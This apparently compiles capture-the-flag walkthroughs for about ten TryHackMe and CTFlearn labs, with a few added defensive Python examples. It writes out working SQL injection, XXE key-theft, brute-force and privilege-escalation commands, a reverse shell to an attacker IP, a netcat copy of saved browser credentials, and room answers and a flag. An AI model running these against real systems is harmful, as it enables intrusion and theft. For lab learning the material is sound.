TryHackMe solution: CTF collection Vol.2

Link: https://tryhackme.com/room/ctfcollectionvol2

#1 “Easter 1”

Access: http://10.10.200.87/robots.txt

Use Hex to Text to decode the string.

#2 “Easter 2”

Decode the base64 string with a Base64 decoder several times and we get the directory:

http://10.10.200.87/DesKel_secret_base/

View page source and we have the flag.

#3 “Easter 3”

Use gobuster and common.txt:

gobuster dir -u http://10.10.221.97/ -w=common.txt

We found:

http://10.10.15.189/login/

View page source.

#4 “Easter 4”

Save the login request into a file named ‘r.txt’ and use sqlmap:

sqlmap -r r.txt --dbms=MySQL --batch --dump

#5 “Easter 5”

From the dump we also have a username and password:

Login and we have the flag.

#6 “Easter 6”

Look at the Response Header.

#7 “Easter 7”

When browsing the site, there is a cookie:

Invited=0

Change the value to 1 and resend the request.

#8 “Easter 8”

There is a hint:

So we change the User-Agent header to a mobile one to get the message:

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1

#9 “Easter 9”

We just need to view source of: http://10.10.200.87/ready/

#10 “Easter 10”

Access: http://10.10.221.97/free_sub/

So we add a Referer header to the request:

Referer: tryhackme.com

#11 “Easter 11”

Change the dinner parameter to ‘egg’ and submit:

dinner=egg&submit=submit

#12 “Easter 12”

View the page source and we find:

http://10.10.15.189/jquery-9.1.2.js

Decode the string with Hex to Text.

#13 “Easter 13”
#14 “Easter 14”

View the page source of the home page; we have:

Use a Base64-to-file converter to decode the base64 string into an image, and the flag is in the image.

#15 “Easter 15”

Each number represents one character (some characters are the same number); work out the mapping and you have the flag.

#16 “Easter 16”

Play game2: http://10.10.221.97/game2/

And we get:

Send the request with all three button parameters:

POST /game2/ HTTP/1.1
Host: 10.10.221.97
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://10.10.221.97
Connection: close
Referer: http://10.10.221.97/game2/
Cookie: Invited=0
Upgrade-Insecure-Requests: 1

button1=button1&button2=button2&button3=button3&submit=submit

#17 “Easter 17”

Again, view the page source of the home page:

Copy the binary string, prepend a ‘0’ to it and decode it with a binary-to-text translator:

01000101 01100001 01110011 01110100 01100101 01110010 00100000 00110001 00110111 00111010 00100000 01010100 01001000 01001101 01111011 01101010 00110101 01011111 01101010 00110101 01011111 01101011 00110011 01110000 01011111 01100100 00110011 01100011 00110000 01100100 00110011 01111101

#18 “Easter 18”

Add a header to the request:

Egg: Yes

#19 “Easter 19”

Use gobuster with common.txt; we find: http://10.10.221.97/small

#20 “Easter 20”

We just need to send a POST request with the username and password:

POST / HTTP/1.1
Host: 10.10.15.189
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://10.10.15.189
Connection: close
Referer: http://10.10.15.189/
Cookie: Invited=0
Upgrade-Insecure-Requests: 1

username=DesKel&password=heIsDumb

TryHackMe solution: Blog

Link: https://tryhackme.com/room/blog

#5 “What version of the above CMS was being used?”
#4 “What CMS was Billy using?”

You may need to add this to your /etc/hosts:

10.10.32.187	blog.thm

Use nmap to find open ports:

nmap -sCV 10.10.32.187

#3 “Where was user.txt found?”
#2 “user.txt”

Reading two posts, we find the usernames of two users: bjoel & kwheel.

We will use hydra with rockyou.txt to brute force the password:

hydra -l kwheel -P rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect" -V

Once we have the password, we can log in to the blog.

We will use Metasploit:

use exploit/multi/http/wp_crop_rce

Set RHOSTS, LHOST, USERNAME, PASSWORD, and run the exploit.

Spawn a TTY shell with:

python3 -c 'import pty; pty.spawn("/bin/bash");'

Find files with SUID:

find / -type f -perm -u=s 2>/dev/null

We find /usr/sbin/checker; trace it with:

ltrace /usr/sbin/checker

It checks an environment variable named ‘admin’, so we set that variable to 1:

export admin=1
checker

To find where user.txt is, we just use the find command:

find / -type f -name user.txt 2>/dev/null

#1 “root.txt”

cat /root/root.txt

TryHackMe solution: Mustacchio

Link: https://tryhackme.com/room/mustacchio

#1 “What is the user flag?”

Enumeration

Scan for open ports with RustScan:

rustscan -a 10.10.125.220 -- -sCV

Access the web: http://10.10.125.220/

View the page source; we find a directory: http://10.10.125.220/custom/js/

Download users.bak.

strings users.bak

We have a credential:

admin:1868e36a6d2b17d4c2745f1659433a54d4bc5f4b

Crack the hash with CrackStation.

Go to: http://10.10.125.220:8765/

And log in.

Foothold

View page source, we have:

Download file: http://10.10.125.220:8765/auth/dontforget.bak

We know that we will inject XML into the text box, and the XML has the format shown in dontforget.bak:

<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>com</com>
</comment>

Then we have:

The hint is:

<!-- Barry, you can now SSH in using your key!-->

So we get the key with:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!ENTITY read SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
  <name>&read;</name>
  <author>Barry Clad</author>
  <com>com</com>
</comment>
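
As an added defensive example (not part of the original walkthrough or the room's code), here is how the comment endpoint could refuse this kind of submission before it ever reaches an XML parser: the comment format above never needs a DTD, so any DOCTYPE or ENTITY declaration is rejected outright, and the two documents from above serve as the test inputs.

```python
import xml.etree.ElementTree as ET

# The benign comment format from dontforget.bak, as shown above.
BENIGN_XML = """<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>com</com>
</comment>"""

# The XXE submission from the walkthrough: a DOCTYPE declaring an external entity.
XXE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!ENTITY read SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
  <name>&read;</name>
  <author>Barry Clad</author>
  <com>com</com>
</comment>"""

class UnsafeXmlError(ValueError):
    """Raised when a submission carries a DOCTYPE or ENTITY declaration."""

def parse_comment(xml_text: str) -> dict:
    """Parse a <comment> submission into {tag: text}, failing closed on any DTD.

    A comment form has no business carrying a DTD, and the DTD is the only
    place an <!ENTITY ... SYSTEM 'file:///...'> can be declared, so the check
    runs on the raw text before any XML parser sees it. The parser used after
    the check is the standard library one, which does not resolve external
    entities either, so there are two independent layers.
    """
    lowered = xml_text.lower()
    if "<!doctype" in lowered or "<!entity" in lowered:
        raise UnsafeXmlError("DOCTYPE/ENTITY declarations are not accepted")
    root = ET.fromstring(xml_text)
    if root.tag != "comment":
        raise ValueError("root element must be <comment>")
    return {child.tag: (child.text or "") for child in root}

def is_accepted(xml_text: str) -> bool:
    """True if the submission parses cleanly, False if it is rejected."""
    try:
        parse_comment(xml_text)
        return True
    except (ET.ParseError, ValueError):
        return False
```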

View the page source for a cleaner view of the key:

Save the key into a file named barry.

Use John the Ripper to crack the key's passphrase; first convert the key with ssh2john.py:

python3 ssh2john.py barry > barry.hash

Next, we use John the Ripper with rockyou.txt.

The John the Ripper documentation explains how to install and use it.

john-the-ripper -w=rockyou.txt barry.hash

And we find the passphrase of the key.

Connect to ssh with:

chmod 600 barry
ssh -i barry barry@10.10.125.220

We found the flag.

#2 “What is the root flag?”

Privilege Escalation

Find SUID files with:

find / -type f -perm -u=s 2>/dev/null

And we find /home/joe/live_log.

strings /home/joe/live_log

This binary calls tail, so we create our own tail and put it first in PATH:

cd /tmp
echo '#!/bin/bash' > tail
echo 'bash -p' >> tail
chmod +x tail
export PATH=/tmp:$PATH
/home/joe/live_log

And we have root shell.

TryHackMe solution: SQHell

Link: https://tryhackme.com/room/sqhell

#1 “Flag 1”

There is a SQL injection vulnerability in the login function, so we can log in with:

username:' or 1=1#
password:a

#2 “Flag 2”

Read Terms and Conditions:

We try adding an “X-Forwarded-For” header to the request and sending it to the server. The request looks like:

GET / HTTP/1.1
Host: 10.10.142.249
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: *

Save the request to a file named r.txt and use sqlmap:

sqlmap -r r.txt --dump --batch

#3 “Flag 3”

The register function does not work; view the page source and we see:

There is a function that checks whether a username already exists.

Use sqlmap to find the flag:

sqlmap -u "http://10.10.174.62/register/user-check?username=a" --dbms=mysql --dump -D sqhell_3 -T flag --batch

#4 “Flag 4”

The request to view a user's information is vulnerable to SQLi:

http://10.10.142.249/user?id=1

Use:

user?id=0 or 1=1--

But there is only one user.

user?id=1 union select null,null,null--

This indicates that there are 3 columns.

When I use:

user?id=0 union select 1,null,null--

The server still returns a user, so I think there is another query here.

user?id=0 union select '1 union select null,null,null,null',null,null--

Now we have 4 columns.

Get the flag with:

user?id=0 union select '1 union select null,flag,null,null from flag',null,null--
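
To make the nested-query behaviour concrete, here is an added Python/sqlite3 model (a hypothetical reconstruction, not the room's code) of an endpoint that runs a 3-column lookup and then a 4-column lookup built from the first result, fed with the payload above; it sits beside a version that binds every value in both stages, which is the fix for this class of second-order injection. The table and column names other than flag.flag, and the sample rows, are constructed.

```python
import sqlite3
# Constructed sample data for this demo only (not the room's schema or flag).
FLAG = "FLAG{constructed_for_demo}"
# The Flag 4 payload from above, as it arrives in the id parameter.
PAYLOAD = "0 union select '1 union select null,flag,null,null from flag',null,null--"

def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, role TEXT);
        CREATE TABLE profiles(id INTEGER, user_id INTEGER, email TEXT, bio TEXT);
        CREATE TABLE flag(flag TEXT);
        INSERT INTO users VALUES (1, 'admin', 'administrator');
        INSERT INTO profiles VALUES (1, 1, 'admin@example.test', 'first user');
    """)
    conn.execute("INSERT INTO flag VALUES (?)", (FLAG,))
    return conn

def lookup_vulnerable(conn, user_id: str) -> list:
    """Hypothetical model of the endpoint: two queries, both built by string
    concatenation. Stage 1 has 3 columns, stage 2 has 4 (the counts found above)."""
    row = conn.execute(
        f"SELECT id, username, role FROM users WHERE id = {user_id}").fetchone()
    if row is None:
        return []
    # Second-order injection: row[0] came back from the database, so it is
    # treated as trusted and concatenated. With PAYLOAD it is a SQL fragment.
    return conn.execute(
        f"SELECT id, user_id, email, bio FROM profiles WHERE user_id = {row[0]}"
    ).fetchall()

def lookup_hardened(conn, user_id: str) -> list:
    """Same two stages, with the type enforced at the boundary and every value
    bound as a parameter, including the one read back from stage 1."""
    try:
        uid = int(user_id)
    except ValueError:
        return []
    row = conn.execute(
        "SELECT id, username, role FROM users WHERE id = ?", (uid,)).fetchone()
    if row is None:
        return []
    return conn.execute(
        "SELECT id, user_id, email, bio FROM profiles WHERE user_id = ?",
        (row[0],)).fetchall()

def values_returned(rows: list) -> set:
    """Flatten result rows so a caller can ask whether the flag leaked."""
    return {v for r in rows for v in r if v is not None}
```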

#5 “Flag 5”

We have a hint.

Hint: Unless displayed on the page the flags are stored in the flag table in the flag column.

So we try the payload:

/post?id=0+union+select+null,flag,null,null+from+flag#

TryHackMe solution: Madness

Link: https://tryhackme.com/room/madness

#1 “user.txt”

Use nmap to find open ports:

nmap -sCV 10.10.17.203

Access: http://10.10.17.203/

View the page source and we see this:

View the image: http://10.10.17.203/thm.jpg, but we get:

Download the image and open it with a hex editor.

The file signature is not a JPEG signature, so we correct it.

Export the image and we have the hidden directory.
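
The same check, written as an added Python example (not part of the original walkthrough): it identifies the format from the magic bytes, flags a file whose signature is wrong but which still carries the JFIF or Exif identifier at offset 6, and rewrites only the first four bytes to the standard JFIF start. It assumes the image is a JFIF JPEG; the sample bytes are constructed.

```python
# Magic bytes for the formats a CTF image is most likely to be.
SIGNATURES = {
    "jpeg": bytes.fromhex("FFD8FF"),          # SOI marker followed by an APPn/DQT marker
    "png": bytes.fromhex("89504E470D0A1A0A"),
    "gif": b"GIF8",
}
# Standard JFIF start: SOI (FFD8) + APP0 marker (FFE0). Assumes a JFIF JPEG.
JFIF_HEADER = bytes.fromhex("FFD8FFE0")

# Constructed sample: a JFIF JPEG whose first four bytes were overwritten with
# zeros, the kind of damage that makes browsers and viewers refuse the file.
DAMAGED_SAMPLE = (
    bytes.fromhex("00000000")            # clobbered SOI + APP0 marker
    + bytes.fromhex("0010")              # APP0 segment length (16)
    + b"JFIF\x00"                        # APP0 identifier at offset 6
    + bytes.fromhex("01010000010001")    # version 1.1, no units, density 1x1
    + bytes.fromhex("0000")              # no thumbnail
    + bytes.fromhex("FFD9")              # EOI, so the sample is a complete (empty) file
)

def identify(data: bytes):
    """Return the format name whose signature the data starts with, else None."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return None

def looks_like_damaged_jpeg(data: bytes) -> bool:
    """Heuristic for the step above: the signature is wrong, but the APP0/APP1
    identifier right after the first four bytes is still JFIF or Exif, so the
    body is a JPEG and only the header was tampered with."""
    return identify(data) != "jpeg" and data[6:10] in (b"JFIF", b"Exif")

def repair_jfif_header(data: bytes) -> bytes:
    """Rewrite only the first four bytes, as done by hand in the hex editor.
    Refuses anything that does not look like a damaged JPEG, so a PNG or an
    already valid JPEG is never corrupted by the 'repair'."""
    if not looks_like_damaged_jpeg(data):
        raise ValueError("not a JPEG with a damaged header")
    return JFIF_HEADER + data[4:]
```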

Access the directory:

View page source and we see a comment.

So I will brute force the request: http://10.10.156.135/th1s_1s_h1dd3n/?secret=1

The secret is between 0 and 99. When we find it (73), we have:

We use the password we found to extract data from the image thm.jpg.

steghide extract -sf thm.jpg

And we find the (encoded) username.

The hint is “There’s something ROTten about this guys name!”, so we use a ROT13 decoder.

And we have the real username.

There is one more image, which many people miss.

Use steghide with a blank passphrase.

steghide extract -sf 5iW7kC8.jpg

And now we have the password.

Use the credentials we found to connect over SSH:

ssh joker@10.10.226.98

And we found user.txt.

#2 “root.txt”

We find files with the SUID bit set:

find / -type f -perm -u=s 2>/dev/null

We will use /bin/screen-4.5.0 to escalate privileges. After researching, I found that we can use this exploit.

Save the exploit in /tmp/pe.sh and run it.

nano /tmp/pe.sh
chmod +x /tmp/pe.sh
/tmp/pe.sh

And we have the flag.

TryHackMe solution: Year of the Rabbit

Link: https://tryhackme.com/room/yearoftherabbit

#1 “What is the user flag?”

Use nmap to find open ports:

nmap -sCV 10.10.202.82

Next, use dirsearch:

python3 dirsearch.py -u 10.10.202.82

And we find /assets/:

Access: /assets/style.css

Access: /sup3r_s3cr3t_fl4g.php

Turn off JavaScript and intercept the response of: 10.10.202.82/sup3r_s3cr3t_fl4g.php

There is a directory in the Location header.

Access this folder.

Download the image and use:

strings Hot_Babe.png

Save the passwords to a file named “ftp_passwords.txt” and use hydra to find the password.

hydra -l ftpuser -P ftp_passwords.txt 10.10.202.82 ftp

Connect to ftp:

ftp 10.10.202.82

We get a text file.

Open this file.

Decode it with a Brainfuck decoder and we have a credential. Use this to connect over SSH:

ssh eli@10.10.202.82

And we have a message.

Let’s find that place.

find / -name "*s3cr3t*" 2>/dev/null

Go to the directory and read the file inside it.

And we have the password of the second user – Gwendoline.

And we find the user’s flag.

#2 “What is the root flag?”

Use “sudo -l” to see what we can do: we can run vi as any user except root (!root).

We can get root with:

sudo -u#-1 vi /home/gwendoline/user.txt
:!/bin/sh

And we can get the flag in /root.

This vulnerability is CVE-2019-14287: sudo treats the user ID -1 (which no account has) as 0, i.e. root, so the !root restriction is bypassed.

TryHackMe solution: Bolt

Link: https://tryhackme.com/room/bolt

#1 “What port number has a web server with a CMS running?”

Use:

nmap -sCV 10.10.11.64

to find open ports.

#2 “What is the username we can find in the CMS?”
#3 “What is the password we can find for the username?”

Access the website.

Scroll down and we will find admin’s messages with the username and password we need.

#4 “What version of the CMS is installed on the server? (Ex: Name 1.1.1)”

We can go to login page with: http://10.10.11.64:8000/bolt/login

Log in with the credentials we found. We get the answer in the Dashboard.

#5 “There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?”

Go to Exploit Database and search for the version we found.

#6 “Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit? (Ex: exploit/….)”

Start Metasploit and search for the exploit.

search exploit bolt cms

#7 “Look for flag.txt inside the machine.”

Set the options we need (LHOST, LPORT, RHOST, USERNAME, PASSWORD) and start to exploit the machine.

We will get the flag in /home.

CTFlearn solution: Gobustme 👻

Scroll down and we find a poem.

We have Gobuster! and a common wordlist, so we use gobuster with this wordlist to find the directory.

gobuster dir -u https://gobustme.ctflearn.com/ -w=common.txt

And the flag is hidden in: https://gobustme.ctflearn.com/hide/

Flag: CTFlearn{gh0sbu5t3rs_4ever}

TryHackMe solution: GLITCH

Link: https://tryhackme.com/room/glitch

#1 “What is your access token?”

Use:

nmap -sCV 10.10.108.245

Port 80 is open, so we access: http://10.10.108.245/

Viewing the page source, we find a link:

Access: http://10.10.108.245/api/access

Decode the token with base64 decoder.

#2 “What is the content of user.txt?”

Use gobuster and common.txt.

gobuster dir -u http://10.10.108.245/api/ -w common.txt

Access: http://10.10.108.245/api/items

Access this link again with the POST method; we get:

Now we use Wfuzz and common.txt to find a parameter.

wfuzz -c -z file,common.txt -X POST --hh 45 -u http://10.10.29.82/api/items\?FUZZ\=test

-c : Output with colors
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
--hh N[,N]+ : Hide responses with the specified chars
-u url : Specify a URL for the request.

We find ‘cmd’; send a POST request to: http://10.10.29.82/api/items?cmd=test

‘test’ is executed in an eval() function. Stand up a netcat listener on port 1234.

nc -lvnp 1234

Create a shell with payload:

cmd=require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1234 >/tmp/f')

URL-encode it:

POST http://10.10.29.82/api/items?%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%36%2e%36%33%2e%31%35%38%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%27%29

And we found the flag.

#3 “What is the content of root.txt?”

In /home/user we find a directory named “.firefox”.

Let’s copy this directory over. On our machine run:

nc -nlvp 1235 > a.tar

On the machine, run:

tar -cf a.tar .firefox/
nc 10.6.63.158 1235 < a.tar

After receiving the file, use:

tar xf a.tar

to extract it.

Open the saved credentials in our Firefox with:

firefox --profile .firefox/b5w4643p.default-release --allow-downgrade

Spawn a tty shell with:

python -c 'import pty; pty.spawn("/bin/sh");'

and change to v0id:

su v0id

Use:

find / -perm -u=s -type f 2>/dev/null

We found /usr/local/bin/doas.

Change to root with:

doas -u root /bin/sh

And we have the flag.

TryHackMe solution: RootMe

Link: https://tryhackme.com/room/rrootme

Task 2: Reconnaissance

#1 “Scan the machine, how many ports are open?”
#2 “What version of Apache is running?”
#3 “What service is running on port 22?”

nmap -sCV 10.10.240.224

#4 “Find directories on the web server using the GoBuster tool.”
#5 “What is the hidden directory?”

We can use common.txt.

gobuster dir -u http://10.10.240.224/ -w common.txt

Task 3: Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

Access: http://10.10.240.224/panel/

We try to upload php-reverse-shell.php to the server (after changing the IP).

But .php is not allowed. Rename our shell to php-reverse-shell.phtml and we can upload it now.

#1 “user.txt”

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Trigger our shell with: http://10.10.240.224/uploads/php-reverse-shell.phtml

Find user.txt with:

find / -type f -name "user.txt" 2>/dev/null

Task 4: Privilege escalation

#1 “Search for files with SUID permission, which file is weird?”

Use this command:

find / -perm -u=s -type f 2>/dev/null

#2 “Find a form to escalate your privileges.”

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

This works because /usr/bin/python has the SUID bit set: the shell it execs is started with -p, so it keeps the elevated privileges instead of dropping them.

#3 “root.txt”

We found root.txt in /root.
